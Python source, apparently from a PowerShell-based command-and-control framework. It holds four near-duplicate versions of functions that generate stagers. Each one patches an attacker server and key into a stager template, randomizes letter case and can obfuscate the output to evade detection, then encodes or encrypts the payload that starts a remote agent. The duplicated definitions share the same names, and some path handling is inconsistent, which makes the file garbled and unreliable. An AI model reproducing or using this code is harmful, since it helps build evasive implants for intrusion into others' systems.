def generate_stager(self,
server,
key,
encrypt=True,
encode=False,
obfuscate=False,
obfuscationCommand=""):
"""
Generate the PowerShell stager that will perform
key negotiation with the server and kick off the agent.
TODO: variable name replacement to change up transport size
... other PowerShell obfuscation techniques?
http://desktoplibrary.livelink-experts.com/obfuscate-powershell-user-manual ?
"""
# read in the stager base
f = open(self.installPath + "/data/agent/stager.ps1")
stager = f.read()
f.close()
# make sure the server ends with "/"
if not server.endswith("/"): server += "/"
# patch the server and key information
stager = stager.replace("REPLACE_SERVER", server)
stager = stager.replace("REPLACE_STAGING_KEY", key)
stager = stager.replace("index.jsp", self.stage1)
stager = stager.replace("index.php", self.stage2)
randomizedStager = ""
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(
randomizedStager,
self.installPath,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
# return an encrypted version of the stager ("normal" staging)
return encryption.xor_encrypt(randomizedStager, key)
else:
# otherwise return the case-randomized stager
return randomizedStager
def generate_stager(self, server, key, encrypt=True, encode=False):
"""
Generate the PowerShell stager that will perform
key negotiation with the server and kick off the agent.
TODO: variable name replacement to change up transport size
... other PowerShell obfuscation techniques?
http://desktoplibrary.livelink-experts.com/obfuscate-powershell-user-manual ?
"""
# read in the stager base
f = open(self.installPath + "/data/agent/stager.ps1".replace('/', os.sep))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not server.endswith(os.sep): server += "/"
# patch the server and key information
stager = stager.replace("REPLACE_SERVER", server)
stager = stager.replace("REPLACE_STAGING_KEY", key)
stager = stager.replace("index.jsp", self.stage1)
stager = stager.replace("index.php", self.stage2)
randomizedStager = ""
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
# return an encrypted version of the stager ("normal" staging)
return encryption.xor_encrypt(randomizedStager, key)
else:
# otherwise return the case-randomized stager
return randomizedStager
def generate_stager_hop(self, server, key, encrypt=True, encode=False):
"""
Generate the PowerShell stager for hop.php redirectors that
will perform key negotiation with the server and kick off the agent.
"""
# read in the stager base
f = open(self.installPath + "./data/agent/stager_hop.ps1")
stager = f.read()
f.close()
# patch the server and key information
stager = stager.replace("REPLACE_SERVER", server)
stager = stager.replace("REPLACE_STAGING_KEY", key)
hosth = ""
if self.headers:
for h in self.headers:
if 'Host' in h:
hosth = h[1]
stager = stager.replace("REPLACE_HOST", hosth)
stager = stager.replace("index.jsp", self.stage1)
stager = stager.replace("index.php", self.stage2)
randomizedStager = ""
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
# return an encrypted version of the stager ("normal" staging)
return encryption.xor_encrypt(randomizedStager, key)
else:
# otherwise return the case-randomized stager
return randomizedStager
def generate_stager_hop(self, server, key, encrypt=True, encode=True):
"""
Generate the PowerShell stager for hop.php redirectors that
will perform key negotiation with the server and kick off the agent.
"""
# read in the stager base
f = open(self.installPath + "./data/agent/stager_hop.ps1")
stager = f.read()
f.close()
# patch the server and key information
stager = stager.replace("REPLACE_SERVER", server)
stager = stager.replace("REPLACE_STAGING_KEY", key)
stager = stager.replace("index.jsp", self.stage1)
stager = stager.replace("index.php", self.stage2)
randomizedStager = ""
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
# return an encrypted version of the stager ("normal" staging)
return encryption.xor_encrypt(randomizedStager, key)
else:
# otherwise return the case-randomized stager
return randomizedStager